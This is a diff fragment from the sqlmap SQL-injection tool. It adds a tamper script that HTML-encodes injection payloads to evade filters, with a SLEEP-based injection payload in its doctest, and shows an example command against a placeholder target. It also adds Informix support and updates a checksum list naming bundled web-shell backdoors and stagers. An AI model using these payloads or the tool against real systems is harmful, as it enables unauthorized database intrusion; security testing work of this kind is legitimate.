+    privileges.add(INFORMIX_PRIVS[privilege.strip()])
# In DB2 we get Y or G if the privilege is
# True, N otherwise
elif Backend.isDbms(DBMS.DB2):
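Informix exposes a user's class as a single letter in sysusers.usertype, hence the one-letter lookup above. An assumed illustration of that mapping (the authoritative dictionary is INFORMIX_PRIVS in lib/core/dicts.py):

PRIVS_ILLUSTRATION = {
    "D": "DBA",       # database administrator
    "R": "RESOURCE",  # may create tables, indexes, procedures
    "C": "CONNECT",   # basic access only
}

def describe_usertype(letter):
    return PRIVS_ILLUSTRATION.get(letter.strip().upper(), "unknown (%r)" % letter)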


@@ -63,8 +63,6 @@ try:
    from lib.core.testing import smokeTest
    from lib.core.testing import liveTest
    from lib.parse.cmdline import cmdLineParser
-    from lib.utils.api import setRestAPILog
-    from lib.utils.api import StdDbOut
except KeyboardInterrupt:
    errMsg = "user aborted"
    logger.error(errMsg)
@@ -101,6 +99,15 @@ def checkEnvironment():
        logger.critical(errMsg)
        raise SystemExit
+    # Patch for pip (import) environment
+    if "sqlmap.sqlmap" in sys.modules:
+        for _ in ("cmdLineOptions", "conf", "kb"):
+            globals()[_] = getattr(sys.modules["lib.core.data"], _)
+        for _ in ("SqlmapBaseException", "SqlmapShellQuitException", "SqlmapSilentQuitException", "SqlmapUserQuitException"):
+            globals()[_] = getattr(sys.modules["lib.core.exception"], _)
def main():
    """
    Main function of sqlmap when running from command line.
@@ -117,6 +124,10 @@ def main():
    initOptions(cmdLineOptions)
    if hasattr(conf, "api"):
+        # heavy imports
+        from lib.utils.api import StdDbOut
+        from lib.utils.api import setRestAPILog
        # Overwrite system standard output and standard error to write
        # to an IPC database
        sys.stdout = StdDbOut(conf.taskid, messagetype="stdout")
@@ -195,7 +206,7 @@ def main():
try:
    if not checkIntegrity():
-        errMsg = "code integrity check failed. "
+        errMsg = "code integrity check failed (turning off automatic issue creation). "
        errMsg += "You should retrieve the latest development version from official GitHub "
        errMsg += "repository at '%s'" % GIT_PAGE
        logger.critical(errMsg)
@@ -203,6 +214,11 @@ def main():
    dataToStdout(excMsg)
    raise SystemExit
+elif "MemoryError" in excMsg:
+    errMsg = "memory exhaustion detected"
+    logger.error(errMsg)
+    raise SystemExit
elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded")):
    errMsg = "no space left on output device"
    logger.error(errMsg)

tamper/htmlencode.py (new file)

@@ -0,0 +1,25 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    HTML encode (using code points) all non-alphanumeric characters

    >>> tamper("1' AND SLEEP(5)#")
    '1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;'
    """

    return re.sub(r"[^\w]", lambda match: "&#%d;" % ord(match.group(0)), payload) if payload else payload
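Tamper scripts run over every payload before it is sent; this one replaces each non-alphanumeric character with its HTML decimal entity, as the doctest shows. A typical invocation (the target URL below is a placeholder):

python sqlmap.py -u "http://target.example/vuln.php?id=1" --tamper=htmlencode -v 3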


@@ -10,7 +10,7 @@ acba8b5dc93db0fe6b2b04ff0138c33c extra/icmpsh/icmpsh.exe_
cc9c82cfffd8ee9b25ba3af6284f057e extra/__init__.py cc9c82cfffd8ee9b25ba3af6284f057e extra/__init__.py
2237d0568236c354b0436d2cd9434f97 extra/mssqlsig/update.py 2237d0568236c354b0436d2cd9434f97 extra/mssqlsig/update.py
cc9c82cfffd8ee9b25ba3af6284f057e extra/safe2bin/__init__.py cc9c82cfffd8ee9b25ba3af6284f057e extra/safe2bin/__init__.py
cc5b67714d8a0b6b81d29a4f15634c16 extra/safe2bin/safe2bin.py a54bde99fd05fdb412cba5a8780f3e18 extra/safe2bin/safe2bin.py
d229479d02d21b29f209143cb0547780 extra/shellcodeexec/linux/shellcodeexec.x32_ d229479d02d21b29f209143cb0547780 extra/shellcodeexec/linux/shellcodeexec.x32_
2fe2f94eebc62f7614f0391a8a90104f extra/shellcodeexec/linux/shellcodeexec.x64_ 2fe2f94eebc62f7614f0391a8a90104f extra/shellcodeexec/linux/shellcodeexec.x64_
c55b400b72acc43e0e59c87dd8bb8d75 extra/shellcodeexec/windows/shellcodeexec.x32.exe_ c55b400b72acc43e0e59c87dd8bb8d75 extra/shellcodeexec/windows/shellcodeexec.x32.exe_
@@ -19,56 +19,55 @@ b46521e29ea3d813bab5aeb16cac6498 extra/shutils/duplicates.py
05615626222060120450518136b14ba9 extra/shutils/regressiontest.py 05615626222060120450518136b14ba9 extra/shutils/regressiontest.py
cc9c82cfffd8ee9b25ba3af6284f057e extra/sqlharvest/__init__.py cc9c82cfffd8ee9b25ba3af6284f057e extra/sqlharvest/__init__.py
4f2f817596540d82f9fcc0c5b2228beb extra/sqlharvest/sqlharvest.py 4f2f817596540d82f9fcc0c5b2228beb extra/sqlharvest/sqlharvest.py
b704c0f943c015f6247cfae20048ae8e lib/controller/action.py 2daa39e4d59526acb4772b6c47eb315f lib/controller/action.py
d1451b43f3ac80bfbea8657e288865f8 lib/controller/checks.py 66cddf7f40c002d663d4401a440ec1aa lib/controller/checks.py
7c5ba631796f12d6de9b667e4cc7812b lib/controller/controller.py 242eb9edf447e09fa3f5d154495308e6 lib/controller/controller.py
5ae8f657fd4e8026fcc9624f5b5533fe lib/controller/handler.py 0a64305c3b3a01a2fc3a5e6204f442f1 lib/controller/handler.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/controller/__init__.py cc9c82cfffd8ee9b25ba3af6284f057e lib/controller/__init__.py
2689f320908964b2c88a3eb8265fd2dd lib/core/agent.py 04f16204c899438dc7599a9a8426bfee lib/core/agent.py
eb0bd28b0bd9fbf67dcc3119116df377 lib/core/bigarray.py eb0bd28b0bd9fbf67dcc3119116df377 lib/core/bigarray.py
1dd298ac06c961037bb76a675bb4b322 lib/core/common.py b1e2ccdeea8bf12feb839d403dc05796 lib/core/common.py
5680d0c446a3bed5c0f2a0402d031557 lib/core/convert.py 5680d0c446a3bed5c0f2a0402d031557 lib/core/convert.py
e77cca1cb063016f71f6e6bdebf4ec73 lib/core/data.py e77cca1cb063016f71f6e6bdebf4ec73 lib/core/data.py
1d042f0bc0557d3fd564ea5a46deb77e lib/core/datatype.py 1d042f0bc0557d3fd564ea5a46deb77e lib/core/datatype.py
e4ca0fd47f20cf7ba6a5f5cbf980073c lib/core/decorators.py e4ca0fd47f20cf7ba6a5f5cbf980073c lib/core/decorators.py
67f206cf2658145992cc1d7020138325 lib/core/defaults.py 67f206cf2658145992cc1d7020138325 lib/core/defaults.py
4a16002c5d9cd047c2e89ddc5db63737 lib/core/dicts.py 439cae0904cf3db20d1bc81d56980a21 lib/core/dicts.py
1f98d3f57ce21d625fd67adb26cfd13c lib/core/dump.py 1f98d3f57ce21d625fd67adb26cfd13c lib/core/dump.py
34a45b9bc68a6381247a620ddf30de1c lib/core/enums.py 1128705f593013359497b3959078b650 lib/core/enums.py
e4aec2b11c1ad6039d0c3dbbfbc5eb1a lib/core/exception.py e4aec2b11c1ad6039d0c3dbbfbc5eb1a lib/core/exception.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/core/__init__.py cc9c82cfffd8ee9b25ba3af6284f057e lib/core/__init__.py
91c514013daa796e2cdd940389354eac lib/core/log.py 91c514013daa796e2cdd940389354eac lib/core/log.py
b9779615206791e6ebbaa84947842b49 lib/core/optiondict.py 5b079749c50240602ea92637e268ed31 lib/core/optiondict.py
57109386dcff87507201f14a5821fd41 lib/core/option.py 16d9e1100189966d8a2224d23fcd2ca2 lib/core/option.py
1e8948dddbd12def5c2af52530738059 lib/core/profiling.py 1e8948dddbd12def5c2af52530738059 lib/core/profiling.py
e60456db5380840a586654344003d4e6 lib/core/readlineng.py e60456db5380840a586654344003d4e6 lib/core/readlineng.py
5ef56abb8671c2ca6ceecb208258e360 lib/core/replication.py 5ef56abb8671c2ca6ceecb208258e360 lib/core/replication.py
99a2b496b9d5b546b335653ca801153f lib/core/revision.py 99a2b496b9d5b546b335653ca801153f lib/core/revision.py
7c15dd2777af4dac2c89cab6df17462e lib/core/session.py 7c15dd2777af4dac2c89cab6df17462e lib/core/session.py
1a8eccb8108e213d7b7257302e82cef8 lib/core/settings.py 1d029b393fe525c9ad1ecac20b064ca5 lib/core/settings.py
7af83e4f18cab6dff5e67840eb65be80 lib/core/shell.py 7af83e4f18cab6dff5e67840eb65be80 lib/core/shell.py
23657cd7d924e3c6d225719865855827 lib/core/subprocessng.py 23657cd7d924e3c6d225719865855827 lib/core/subprocessng.py
0bc2fae1dec18cdd11954b22358293f2 lib/core/target.py c3ace7874a536d801f308cf1fd03df99 lib/core/target.py
21b9aa385c851a4e8faaff9b985e29b8 lib/core/testing.py d43f059747ffd48952922c94152e2a07 lib/core/testing.py
424a6cf9bdfaf7182657ed7929d7df5a lib/core/threads.py 2cafee22d9f8018e7efff0a5e3178596 lib/core/threads.py
53c15b78e0288274f52410db25406432 lib/core/unescaper.py 53c15b78e0288274f52410db25406432 lib/core/unescaper.py
6bdc53e2ca152ff8cd35ad671e48a96b lib/core/update.py 6bdc53e2ca152ff8cd35ad671e48a96b lib/core/update.py
8485a3cd94c0a5af2718bad60c5f1ae5 lib/core/wordlist.py 8485a3cd94c0a5af2718bad60c5f1ae5 lib/core/wordlist.py
354ecc0c6d3e0ac9c06ed897c4d52edf lib/core/xmldump.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/__init__.py cc9c82cfffd8ee9b25ba3af6284f057e lib/__init__.py
c1288bc4ce5651dbdd82d4a9435fdc03 lib/parse/banner.py c1288bc4ce5651dbdd82d4a9435fdc03 lib/parse/banner.py
daea32290b63c43f7d1c0e14c66d4826 lib/parse/cmdline.py bc8a27a451d988398d7e25a786b2c8a2 lib/parse/cmdline.py
8ec4d4f02634834701f8258726f2e511 lib/parse/configfile.py 8ec4d4f02634834701f8258726f2e511 lib/parse/configfile.py
fe4e2152292587928edb94c9a4d311ff lib/parse/handler.py fe4e2152292587928edb94c9a4d311ff lib/parse/handler.py
8e6bfb13e5a34b2610f3ff23467a34cf lib/parse/headers.py 8e6bfb13e5a34b2610f3ff23467a34cf lib/parse/headers.py
c8e14fbfc6616d8149b2603c97abec84 lib/parse/html.py cfa7b4c52915e1d7d59409ed49f0e623 lib/parse/html.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/parse/__init__.py cc9c82cfffd8ee9b25ba3af6284f057e lib/parse/__init__.py
af6b8e1c6eb074b56bbd9cd80aebcd97 lib/parse/payloads.py af6b8e1c6eb074b56bbd9cd80aebcd97 lib/parse/payloads.py
b40a4c5d91770d347df36d3065b63798 lib/parse/sitemap.py b40a4c5d91770d347df36d3065b63798 lib/parse/sitemap.py
9299f21804033f099681525bb9bf51c0 lib/request/basicauthhandler.py 9299f21804033f099681525bb9bf51c0 lib/request/basicauthhandler.py
a3e83cfe7e6825fb1b70951ad290d2ae lib/request/basic.py 083e7f446909b12009e72ae8e5e5737c lib/request/basic.py
97fb6323bfb5f941b27cbdb00f9078e1 lib/request/comparison.py c48285682a61d49982cb508351013cb4 lib/request/comparison.py
8bc040159a145a1dfdf8a3fe76a0adbc lib/request/connect.py 3b35467cd761ed53dfb35a85d8d6590d lib/request/connect.py
49b4c583af68689de5f9acb162de2939 lib/request/direct.py 49b4c583af68689de5f9acb162de2939 lib/request/direct.py
1a46f7bb26b23ec0c0d9d9c95828241b lib/request/dns.py 1a46f7bb26b23ec0c0d9d9c95828241b lib/request/dns.py
70ceefe39980611494d4f99afb96f652 lib/request/httpshandler.py 70ceefe39980611494d4f99afb96f652 lib/request/httpshandler.py
@@ -82,12 +81,12 @@ b2ffd261947994f4a4af555d468b4970 lib/request/rangehandler.py
937b7e276f25ccac5a2ac0bf9b1ef434 lib/takeover/abstraction.py 937b7e276f25ccac5a2ac0bf9b1ef434 lib/takeover/abstraction.py
3ecf028d8d93025d2a12c6f6fc13adb2 lib/takeover/icmpsh.py 3ecf028d8d93025d2a12c6f6fc13adb2 lib/takeover/icmpsh.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/takeover/__init__.py cc9c82cfffd8ee9b25ba3af6284f057e lib/takeover/__init__.py
1d064463302b85b2241263ea48a83837 lib/takeover/metasploit.py 2d39688ec1b871005b520b6f1ed97ba6 lib/takeover/metasploit.py
7083825564c051a7265cfdd1a5e6629c lib/takeover/registry.py 7083825564c051a7265cfdd1a5e6629c lib/takeover/registry.py
7d6cd7bdfc8f4bc4e8aed60c84cdf87f lib/takeover/udf.py 7d6cd7bdfc8f4bc4e8aed60c84cdf87f lib/takeover/udf.py
f6e3084abd506925a8be3d1c0a6d058c lib/takeover/web.py d9bdcc17091374c53ad2eea7fd72a909 lib/takeover/web.py
9af83a62de360184f1c14e69b8a95cfe lib/takeover/xp_cmdshell.py 9af83a62de360184f1c14e69b8a95cfe lib/takeover/xp_cmdshell.py
927092550c89f8c3c5caad2b14af0830 lib/techniques/blind/inference.py 27d41f38de7348600309e1cb6741fb2e lib/techniques/blind/inference.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/techniques/blind/__init__.py cc9c82cfffd8ee9b25ba3af6284f057e lib/techniques/blind/__init__.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/techniques/brute/__init__.py cc9c82cfffd8ee9b25ba3af6284f057e lib/techniques/brute/__init__.py
d36effffe64e63ef9b3be490f850e2cc lib/techniques/brute/use.py d36effffe64e63ef9b3be490f850e2cc lib/techniques/brute/use.py
@@ -102,7 +101,7 @@ f5d6884cdeed28281187c111d3e49e3b lib/techniques/union/test.py
12ce1bb7ee5f1f23f58be12fe9fa8472 lib/techniques/union/use.py 12ce1bb7ee5f1f23f58be12fe9fa8472 lib/techniques/union/use.py
26c1babc6289fac9056f8b21d10f3bb1 lib/utils/api.py 26c1babc6289fac9056f8b21d10f3bb1 lib/utils/api.py
8cdc8c1e663c3b92a756fb7b02cc3c02 lib/utils/crawler.py 8cdc8c1e663c3b92a756fb7b02cc3c02 lib/utils/crawler.py
393f8fd1684308213e1d2e6a9d4258c2 lib/utils/deps.py e30011943692aa2fe7c1185974112bc0 lib/utils/deps.py
4dfd3a95e73e806f62372d63bc82511f lib/utils/getch.py 4dfd3a95e73e806f62372d63bc82511f lib/utils/getch.py
b1e83fc549334fae8f60552dcdad28cb lib/utils/hashdb.py b1e83fc549334fae8f60552dcdad28cb lib/utils/hashdb.py
0330607242d4f704ae6d7bba5f52ccae lib/utils/hash.py 0330607242d4f704ae6d7bba5f52ccae lib/utils/hash.py
@@ -115,7 +114,7 @@ cc9b0f68dd58a2576a5a454b7f5f6b9c lib/utils/search.py
4a0374ac0bc9d726446f04c77fbb5697 lib/utils/sqlalchemy.py 4a0374ac0bc9d726446f04c77fbb5697 lib/utils/sqlalchemy.py
8013e4a4c62ad916452434ea3c352a7a lib/utils/timeout.py 8013e4a4c62ad916452434ea3c352a7a lib/utils/timeout.py
e6fa0e76367a77015da113811dfd9712 lib/utils/versioncheck.py e6fa0e76367a77015da113811dfd9712 lib/utils/versioncheck.py
4759e0bb8931d461dfcad410ca05fc5d lib/utils/xrange.py adafdb28095ba2d03322fee2aae4548f lib/utils/xrange.py
988100b4a1cd3b07acfd8b6ec692aed5 plugins/dbms/access/connector.py 988100b4a1cd3b07acfd8b6ec692aed5 plugins/dbms/access/connector.py
27a5ae5611836b073dd53b21435f0979 plugins/dbms/access/enumeration.py 27a5ae5611836b073dd53b21435f0979 plugins/dbms/access/enumeration.py
438090ab8ca63d9c23831a5ffbef74d9 plugins/dbms/access/filesystem.py 438090ab8ca63d9c23831a5ffbef74d9 plugins/dbms/access/filesystem.py
@@ -144,6 +143,13 @@ c9d59b7c60aa0f0b23f920f932547e40 plugins/dbms/hsqldb/fingerprint.py
d278ad5f1c13fea871ed1120942244d5 plugins/dbms/hsqldb/__init__.py d278ad5f1c13fea871ed1120942244d5 plugins/dbms/hsqldb/__init__.py
d781720e15c23b662bae3098ed470756 plugins/dbms/hsqldb/syntax.py d781720e15c23b662bae3098ed470756 plugins/dbms/hsqldb/syntax.py
2f957281cfe80396f73a3dccc0cb6d45 plugins/dbms/hsqldb/takeover.py 2f957281cfe80396f73a3dccc0cb6d45 plugins/dbms/hsqldb/takeover.py
78917f19ea0750a665094d7dd7778d0c plugins/dbms/informix/connector.py
d251aecff7544f79f78385386bb7fa35 plugins/dbms/informix/enumeration.py
e8f0f28da98020dce27970a50e10a23b plugins/dbms/informix/filesystem.py
89540595a6011b47629c68d11a5e4533 plugins/dbms/informix/fingerprint.py
99a77ad7aa7ca4a4b5981f2fa0d9c616 plugins/dbms/informix/__init__.py
8300ca02ecf00d3b00d78ecde8a86c09 plugins/dbms/informix/syntax.py
5f130772d2295ae61140acba894eaceb plugins/dbms/informix/takeover.py
cc9c82cfffd8ee9b25ba3af6284f057e plugins/dbms/__init__.py cc9c82cfffd8ee9b25ba3af6284f057e plugins/dbms/__init__.py
4c8667e8af763ddf82ee314c6681d4e1 plugins/dbms/maxdb/connector.py 4c8667e8af763ddf82ee314c6681d4e1 plugins/dbms/maxdb/connector.py
075fd66b8bbabed18aeb304c6c0ef2a2 plugins/dbms/maxdb/enumeration.py 075fd66b8bbabed18aeb304c6c0ef2a2 plugins/dbms/maxdb/enumeration.py
@@ -162,7 +168,7 @@ f3da9f5298dac5d1f468828c07c81f70 plugins/dbms/mssqlserver/takeover.py
d8cd212ba7be09483af3f32256b71f05 plugins/dbms/mysql/connector.py d8cd212ba7be09483af3f32256b71f05 plugins/dbms/mysql/connector.py
d251aecff7544f79f78385386bb7fa35 plugins/dbms/mysql/enumeration.py d251aecff7544f79f78385386bb7fa35 plugins/dbms/mysql/enumeration.py
a970f90c91ebd3a7e22955424fe5414e plugins/dbms/mysql/filesystem.py a970f90c91ebd3a7e22955424fe5414e plugins/dbms/mysql/filesystem.py
eed5093257e65adfae7bb56c5a6d3eb0 plugins/dbms/mysql/fingerprint.py edc62bbf269d053ccc68b4cdfebdf12b plugins/dbms/mysql/fingerprint.py
a4535cb3873ada344e6e61dbe1a546d3 plugins/dbms/mysql/__init__.py a4535cb3873ada344e6e61dbe1a546d3 plugins/dbms/mysql/__init__.py
4ad721acc40a964fc67154dd4683870e plugins/dbms/mysql/syntax.py 4ad721acc40a964fc67154dd4683870e plugins/dbms/mysql/syntax.py
aa88b5d6198cd31d9ab2be664da9a265 plugins/dbms/mysql/takeover.py aa88b5d6198cd31d9ab2be664da9a265 plugins/dbms/mysql/takeover.py
@@ -176,7 +182,7 @@ cac6bd84d44ac929da6800719279875b plugins/dbms/oracle/takeover.py
6c54ca5c9efad3e437467f9fe44435d6 plugins/dbms/postgresql/connector.py 6c54ca5c9efad3e437467f9fe44435d6 plugins/dbms/postgresql/connector.py
419dd50e6688fef760fec4f71430fb29 plugins/dbms/postgresql/enumeration.py 419dd50e6688fef760fec4f71430fb29 plugins/dbms/postgresql/enumeration.py
9756fc02fc84719c3e330fcc7914bf17 plugins/dbms/postgresql/filesystem.py 9756fc02fc84719c3e330fcc7914bf17 plugins/dbms/postgresql/filesystem.py
28bce42dac3ee8efccc78c7a58b170b6 plugins/dbms/postgresql/fingerprint.py 5bd67a898b9671c78b00b9299674e6d7 plugins/dbms/postgresql/fingerprint.py
0e7d17abf68f1dd770e969c84878d246 plugins/dbms/postgresql/__init__.py 0e7d17abf68f1dd770e969c84878d246 plugins/dbms/postgresql/__init__.py
8711e7c1265a5e651c9aadca7db40cd5 plugins/dbms/postgresql/syntax.py 8711e7c1265a5e651c9aadca7db40cd5 plugins/dbms/postgresql/syntax.py
50d8070e687e5806058a121311a36385 plugins/dbms/postgresql/takeover.py 50d8070e687e5806058a121311a36385 plugins/dbms/postgresql/takeover.py
@@ -196,8 +202,8 @@ d0c7cc8ec2aa716b2e5cd3b5ab805c3a plugins/dbms/sybase/__init__.py
7a1c6cb238b5b464e1e9641469e6e503 plugins/dbms/sybase/takeover.py 7a1c6cb238b5b464e1e9641469e6e503 plugins/dbms/sybase/takeover.py
62faa58e5aace4b6a6d562788685186f plugins/generic/connector.py 62faa58e5aace4b6a6d562788685186f plugins/generic/connector.py
cdbf6eec4a94f830deb7dbab1c1a2935 plugins/generic/custom.py cdbf6eec4a94f830deb7dbab1c1a2935 plugins/generic/custom.py
977bbd1bced67c2c4aa74d12c77ac165 plugins/generic/databases.py f27f76bfd2ed9ce384dcd43fb7e10226 plugins/generic/databases.py
f2394baa3746188184be2144025eeffc plugins/generic/entries.py 1177bbad4e77a2ca85e0054569e03d38 plugins/generic/entries.py
e335b868f5fb1154c9f72143d602915d plugins/generic/enumeration.py e335b868f5fb1154c9f72143d602915d plugins/generic/enumeration.py
3e673ef4e6592f52a11d88e61fe4dc2b plugins/generic/filesystem.py 3e673ef4e6592f52a11d88e61fe4dc2b plugins/generic/filesystem.py
5637c508ca6348f29c2b100a3e80dddc plugins/generic/fingerprint.py 5637c508ca6348f29c2b100a3e80dddc plugins/generic/fingerprint.py
@@ -206,7 +212,7 @@ cc9c82cfffd8ee9b25ba3af6284f057e plugins/generic/__init__.py
7b3e044a7fca497278d79883697089b7 plugins/generic/search.py 7b3e044a7fca497278d79883697089b7 plugins/generic/search.py
73f8d047dbbcff307d62357836e382e6 plugins/generic/syntax.py 73f8d047dbbcff307d62357836e382e6 plugins/generic/syntax.py
da3ebc20998af02e3d952d0417a67792 plugins/generic/takeover.py da3ebc20998af02e3d952d0417a67792 plugins/generic/takeover.py
4b5a6e2aec8e240fc43916d9dde27b14 plugins/generic/users.py d35f994664fb7a7fcee656633dfb31ed plugins/generic/users.py
cc9c82cfffd8ee9b25ba3af6284f057e plugins/__init__.py cc9c82cfffd8ee9b25ba3af6284f057e plugins/__init__.py
b04db3e861edde1f9dd0a3850d5b96c8 shell/backdoor.asp_ b04db3e861edde1f9dd0a3850d5b96c8 shell/backdoor.asp_
158bfa168128393dde8d6ed11fe9a1b8 shell/backdoor.aspx_ 158bfa168128393dde8d6ed11fe9a1b8 shell/backdoor.aspx_
@@ -218,7 +224,7 @@ c3cc8b7727161e64ab59f312c33b541a shell/stager.aspx_
1f7f125f30e0e800beb21e2ebbab18e1 shell/stager.jsp_ 1f7f125f30e0e800beb21e2ebbab18e1 shell/stager.jsp_
01e3505e796edf19aad6a996101c81c9 shell/stager.php_ 01e3505e796edf19aad6a996101c81c9 shell/stager.php_
56702e95555adee718b6a11ee7098fd4 sqlmapapi.py 56702e95555adee718b6a11ee7098fd4 sqlmapapi.py
bb63aa4415b779ddabe93b10300ce813 sqlmap.py 4b8d19a39402dc7f8a341608a9625aa1 sqlmap.py
1316deb997418507e76221c84ec99946 tamper/apostrophemask.py 1316deb997418507e76221c84ec99946 tamper/apostrophemask.py
a6efe8f914c769c52afec703bd73609f tamper/apostrophenullencode.py a6efe8f914c769c52afec703bd73609f tamper/apostrophenullencode.py
b1c56983919b69f4f6f0e7929c881e7a tamper/appendnullbyte.py b1c56983919b69f4f6f0e7929c881e7a tamper/appendnullbyte.py
@@ -235,6 +241,7 @@ e2aca0ea57afc24dd154472034dc9c8c tamper/commalessmid.py
11bb0652668bb6624494567fd92933b3 tamper/escapequotes.py 11bb0652668bb6624494567fd92933b3 tamper/escapequotes.py
731c25dd33fca28514930d4409daaaa3 tamper/greatest.py 731c25dd33fca28514930d4409daaaa3 tamper/greatest.py
1becabc90d81c70fd24b54cae03a3702 tamper/halfversionedmorekeywords.py 1becabc90d81c70fd24b54cae03a3702 tamper/halfversionedmorekeywords.py
61add9dce3c0c9035901db87fa969c89 tamper/htmlencode.py
17313c5a68aa44325616e0e38869b98e tamper/ifnull2ifisnull.py 17313c5a68aa44325616e0e38869b98e tamper/ifnull2ifisnull.py
dd71bbc7f76ef55a2c9c16645347ead8 tamper/informationschemacomment.py dd71bbc7f76ef55a2c9c16645347ead8 tamper/informationschemacomment.py
cc9c82cfffd8ee9b25ba3af6284f057e tamper/__init__.py cc9c82cfffd8ee9b25ba3af6284f057e tamper/__init__.py
@@ -351,22 +358,22 @@ ea649aae139d8551af513769dd913dbf thirdparty/termcolor/termcolor.py
1501fa7150239b18acc0f4a9db2ebc0d udf/mysql/linux/64/lib_mysqludf_sys.so_ 1501fa7150239b18acc0f4a9db2ebc0d udf/mysql/linux/64/lib_mysqludf_sys.so_
7824059e8fc87c4a565e774676e2f1eb udf/mysql/windows/32/lib_mysqludf_sys.dll_ 7824059e8fc87c4a565e774676e2f1eb udf/mysql/windows/32/lib_mysqludf_sys.dll_
7fed5b8e99e36ce255c64527ec61a995 udf/mysql/windows/64/lib_mysqludf_sys.dll_ 7fed5b8e99e36ce255c64527ec61a995 udf/mysql/windows/64/lib_mysqludf_sys.dll_
6b4dc184e545d7bd5e7c31590647471d udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ 0ee1310d4e2a4cc5a7295df01a3a78bf udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
8c5573d1da59024c47d00cc8492a92df udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ c7d9e1fcac5f047edf17d79a825fb64b udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
b9930f6bf43780fff469bc40e20599c3 udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ ec41a080f4570c3866b9a7219f7623c4 udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
6930b6d67f4d52b5c1663ac2d8460576 udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ 337e2b84dfb089d1ba78323ab2fd21bd udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
5c177ee2cffad6133e99a24d1f913660 udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ e3234ad91b65c476e69743b196ea8394 udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
4d0c06a51c5b03b41ad4df33a304d282 udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ 2e39682ab7f7f9d6bcce6a3f9dac576b udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
db0b1fe75fd9db96c1fc6ab42ae76d70 udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ b17ade3fe472b00f6d4d655f0d1036b2 udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
df8524a627568864e1de516bbe5718ef udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ 3dfc42ea62f5db4196a1b736c603ef0f udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
3c3e3b72fa5b5860108a0350a0604ba2 udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ fe297bfe5e27e7f99d64b2d6baa766fe udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
b10e351f5d8c07fdf08dc3f44b00c01c udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ d7ce763983f5ef4cdae07480c7e16c36 udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
7714b28ee7669f60a2321f1b4ce6bba8 udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ f9e5d7a8f1fbd8df80d07f72ada0251b udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
9911482642131fd3be6a03a28294d24a udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ 10a20abaf98ff25527702c7e37187427 udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
fed2ed6df3f809b1019e9a0ee102799d udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ 0b5158292758f4a67cb1bdfcefcd4ef3 udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
d5d004b396ca5b14afe03a294d42c475 udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ 1d8eb0e3d38f1265ea1bef7f9ec60230 udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
5b79d7f667a0e1e4a70a5ceb70107cbe udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ 1222dac08cf53e31e74e350a2c17452f udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
b396f050d36e82baf2724f140165fbd5 udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ 27761c5e046da59f1f1e11f6d194e38a udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
a6b9c964f7c7d7012f8f434bbd84a041 udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ a6b9c964f7c7d7012f8f434bbd84a041 udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
d9006810684baf01ea33281d21522519 udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ d9006810684baf01ea33281d21522519 udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
ca3ab78d6ed53b7f2c07ed2530d47efd udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ ca3ab78d6ed53b7f2c07ed2530d47efd udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
@@ -400,7 +407,7 @@ cc9c82cfffd8ee9b25ba3af6284f057e waf/__init__.py
32516985d3cb0aeeb1bf28062820b045 waf/kona.py 32516985d3cb0aeeb1bf28062820b045 waf/kona.py
c3de612a7960b08e1e7f97aa05b58df1 waf/modsecurity.py c3de612a7960b08e1e7f97aa05b58df1 waf/modsecurity.py
dc79a2e675d17df4cba1f8b839cbc11b waf/netcontinuum.py dc79a2e675d17df4cba1f8b839cbc11b waf/netcontinuum.py
c218fd16246dfbbd0485cb3456182c71 waf/netscaler.py 8d3230fa3c6a7e41dc85dd04c95db044 waf/netscaler.py
4e05b8169e53edd36a6269e937958744 waf/newdefend.py 4e05b8169e53edd36a6269e937958744 waf/newdefend.py
